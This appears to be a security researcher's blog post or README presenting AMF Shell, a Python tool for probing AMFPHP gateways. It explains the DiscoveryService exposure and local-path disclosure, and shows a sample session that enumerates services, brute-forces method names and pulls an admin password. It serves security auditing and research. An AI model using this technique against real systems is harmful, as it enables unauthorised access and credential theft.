Action Message Format (AMF) Shell

Introduction
Source: Wikipedia
Action Message Format (AMF) is a binary format used to serialize ActionScript objects. It is used primarily to exchange data between an Adobe Flash application and a remote service, usually over the internet.

Background
When I was auditing the security of a content management system based on Flash, I quickly realized that the information that I could dig out by hand from the binary communication wouldn't take me the whole way. Burp Suite Pro, which I was using at the time has a neat feature that decodes the serialized communication on the fly. However, it doesn't provide an adequate way to manipulate. Therefore, I started investigating into possibilities of making a tool that could in fact communicate freely with the AMF gateway using its own protocol.

After some investigation, I found PyAMF, which is a Python implementation of the AMF messaging protocol. The tool that I started making then turned into something that I'd like to call, a AMF Shell.

AMFPHP Vulnerabilities
There are a number of vulnerabilities that are standard with AMFPHP, which was the gateway software that I've constructed AMFShell around. By default, there is a so called "Service Browser" installed that allows you to to pretty much the same as my AMF Shell. It's typically installed in a path such as:

http://www.victim.com/amfphp/browser

However, most administrators are aware of this vulnerability and have removed the Flash page. What they usually haven't removed is the service files associated with it. They are typically located at:

http://www.victim.com/amfphp/services/amfphp/DiscoveryServices.php

DiscoveryService.php is the AMF class that the Service Browser calls on to do it's magic. This class can still be contacted using AMFShell for example. The vulnerability resides in the fact that the DiscoveryService class has methods that enumerates other local services and classes and returns them.

The other vulnerability in AMFPHP is that it discloses the local path in case one is trying to use a non-existent class or method. What you'll get is something like this, when trying to access a class called 'asdf':

The class {asdf} could not be found under the class path {/mnt/target03/350439/508174/www/web/content/amfphp/services/asdf.php}

Yes, I've also been investigating into the possibility of directory traversal but have so far been unsuccessful. One of the reasons is that it converts dots '.' into slashes and is not subjected to hex or any other encoding.

Available commands
brute
Launches a brute force attack for method names to the selected class using common names.
call methodName(args,..)
Call a method from the current class. Arguments
may be single arguments or arrays:
call methodName(['array','of','stuff'])
call methodName(arg1,arg2,arg3)

list
Lists available classes
use service.className
Change current class

Download
git clone git://github.com/georgehedfors/AMFShell.git

Usage example
$ ./amfshell.py http://www.victim.com/amfphp/gateway.php
[+] AMFPHP exists and appears to be vulnerable to 'DiscoveryService'.
[*] To disable 'DiscoveryServices', remove /homepages/16/d264/htdocs/services/amfphp/DiscoveryService.php

Welcome to Action Message Formate Shell by George Hedfors. Type 'help' for command list.

(amfphp.DiscoveryService) list
amfphp.DiscoveryService
UserService
(amfphp.DiscoveryService) use UserService
(UserService) brute
This may seriously harm your environment, are you sure? (y/N): y
Testing 539 methods...
Missing argument 1 for UserService::addUser()
Missing argument 1 for UserService::getUser()
Missing argument 1 for UserService::updateUser()
(UserService) call getUser(admin)
{"username": "admin", "password": "admin123", "id": "1"}

What could possibly go wrong from here? :)

Known bugs
Some pages return HTML content instead of AMF when calling a method. This cannot be parsed by PyAMF but can easily be viewed using a sniffing tool, such as Wireshark.